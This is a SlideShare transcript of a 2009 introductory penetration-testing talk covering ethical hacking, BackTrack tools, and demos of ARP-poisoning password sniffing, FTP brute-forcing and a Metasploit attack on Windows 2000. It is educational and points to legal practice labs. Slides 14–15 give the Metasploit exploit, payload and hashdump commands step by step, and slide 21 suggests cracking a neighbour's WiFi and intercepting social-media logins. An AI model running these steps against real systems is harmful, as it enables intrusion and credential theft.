Hack Attack! An Introduction to Penetration Testing
Upcoming SlideShare
Loading in...5
×

Like this? Share it with your network

Share

Hack Attack! An Introduction to Penetration Testing

  • 9,264 views
Uploaded on

 

More in: Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
9,264
On Slideshare
9,217
From Embeds
47
Number of Embeds
3

Actions

Shares
Downloads
345
Comments
0
Likes
5

Embeds 47

http://www.slideshare.net 36
http://agentsil.blogspot.com 10
http://webcache.googleusercontent.com 1

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. Hack Attack! An Introduction to Penetration Testing Steve Phillips (aka fraktil) 2009.12.17 @ SBLUG
  • 2. Who Am I? ● Attended UCSB 2004-2008 – Majored in Math and Philosophy, not CS ● Started using Linux in 2001 – Mandrake, then Slackware, then Debian ● Applying for penetration testing job in January ● Biases/“Preferences” – Linux > Windoze (duh) – Python > Ruby – Emacs > vi – Debian (and variants) > others
  • 3. Can Hacking Be Ethical? Or, what is Ethical Hacking? ● Black Hat – Compromises computer systems without permission – Criminal ● White Hat, aka Ethical Hacker – Gets paid to hack – legally (friggin' sweet) – Always gets permission before attacking a system ● Gray Hat – Some combination of Black and White
  • 4. The Stages of Hackerdom ● Script Kiddie (“skiddie”) – Can only run automated tools – Doesn't understand underlying technology ● Advanced Beginner – Mastered advanced features of many tools – Knows enough programming to create own tools ● C => Python, Ruby (see next slide) ● Uberhacker – Discovers new vulnerabilities (or new types of vulns) – Knows Assembly, C, Python and/or Ruby, SQL – Excellent programmer; writes tools, scripts regularly – Can defend as well as attack (firewalls, IDS, etc)
  • 5. Programming Languages Used to Create Hacking Tools ● C – Nmap (network mapper, portscanner, more) – Nessus (vulnerability detection) – Wireshark (network sniffer) ● Python – w3af (web app attack framework) – sqlmap (automatic SQL injection) – TheMiddler (session hijacking, targeted pw sniffing) ● Ruby – Metasploit (vuln exploitation, much more)
  • 6. What About in Back|Track 4? Overall: Tools + Exploits ● File count: find /pentest | grep .c$ | wc -l ● Line count: cat $(find /pentest | grep .c$) | wc -l ● C: 4058 .c files 1,300,000 lines ● Python: 2431 .py files 612,000 lines ● Ruby: 5468 .rb files 694,000 lines ● 2773 files from Metasploit ● 1271 files from Dradis (information organizing, sharing) ● 1424 other ● C++: 431 .cpp files 144,000 lines
  • 7. What About in Back|Track 4? Exploits Only (from exploitdb) ● C – 1321 .c files ● Python – 405 .py files ● Ruby – 146 .rb files ● C++ – 110 .cpp files
  • 8. TIOBE Index Programming Language Popularity
  • 9. Back|Track 4 Categories ● Information Gathering – Email addresses, DNS ● Network Mapping ● Vulnerability Identification ● Web Application Analysis ● Radio Network Analysis ● Penetration (not that kind)
  • 10. Back|Track 4 Categories ● Privilege Escalation ● Maintaining Access ● Digital Forensics ● Reverse Engineering ● VoIP (Voice over Internet Protocol) ● Misc
  • 11. DEMO: Sniffing Passwords with Ettercap ● ARP Poisoning for MitM Attack – Associate attacker's MAC with router's IP – Target tries to route traffic through router ● Routes it through attacker instead – Attacker forwards traffic both ways – Attacker can silently watch or inject traffic ● TheMiddler, sslstrip
  • 12. How Else Can We Get Creds? ● Phishing – Via email ● Spear Phishing – Becoming popular – Very hard to stop ● In-person Social Engineering – Kevin Mitnick is famous for this ● Brute force
  • 13. DEMO: Bruteforcing FTP ● Using Hydra to bruteforce weak FTP password – Well, really a dictionary attack
  • 14. DEMO: Pwning Win2k ● Create database (or connect to existing) – db_create [optional_database_name] ● Find win2k box using nmap (in metasploit) – db_nmap -sV -p 135,139,445 xxx.xxx.xxx.0/24 ● Search Metasploit for win2k exploits – search 2000 ● Use exploit w/meterpreter – use exploit/windows/smb/ms05_039_pnp – set PAYLOAD windows/meterpreter/bind_tcp ● Which parameters still need to be set? – show options
  • 15. DEMO: Pwning Win2k ● Set parameters – set RHOST [target_ip] ● Now we exploit! Can you guess the command? – exploit ● Get hashes – hashdump – This would be much harder without meterpreter! ● Copy and paste hashes into new text file ● Crack hashes with john the ripper – ./john [file_containing_hashes].txt ● Game Over
  • 16. Why Become an Ethical Hacker? ● Field is growing (see next slide) – New laws, regulations – US government falling behind in cyber security ● You get paid to hack – need I say more? – Banks – Telecoms – Casinos – Foreign countries (for the federal gov't)
  • 17. How Can I Practice Legally? ● Virtualization (VMware, VirtualBox) – Use virtual images from recent CTF competitions ● http://lampsecurity.org/capture-the-flag-6 ● http://ctf.hcesperer.org/25c3ctf ● http://ctf.hcesperer.org/daopen08 ● http://ctf.hcesperer.org/eh08ctf ● NetWars – Part of government's Cyber Defense Initiative 2009 ● DVL: Damn Vulnerable Linux – Purposely misconfigured, exploitable – http://tinyurl.com/dvllinux15
  • 18. Further Resources Learning ● Metasploit – Online Class: http://www.offensive- security.com/metasploit-unleashed/ ● Nmap Guide – http://nmap.org/book/man.html ● Security Videos, Tutorials – http://securitytube.net
  • 19. Tools Added to Back|Track Extra Tools I Used ● Metasploit 3.3.2 (updated) ● Nmap 5.0 (updated) ● Exploitdb archive (/pentest/exploits/exlpoitdb)
  • 20. Summary ● Hacking can be ethical ● “Computer security” is an oxymoron – No one is safe ● REALLY powerful hacking tools exist ● Metasploit is effing dangerous
  • 21. Future Demos? ● More local fun – Crack neighbor's wifi (WEP) – Exploit remote vuln in DD-WRT firmware – Redirecting traffic using fake DNS server – Intercepting Twitter, Facebook, LinkedIn creds ● More like real pen testing – SQL injection – XSS – Nessus scan
  • 22. Contact Information ● Name: Steve Phillips ● New Blog: SweetHack.blogspot.com ● Email: fraktil@gmail.com ● Twitter: twitter.com/fraktil ● LinkedIn: linkedin.com/in/sdphillips ● IRC: fraktil in #sblug on borg-cube.com
  • 23. Questions?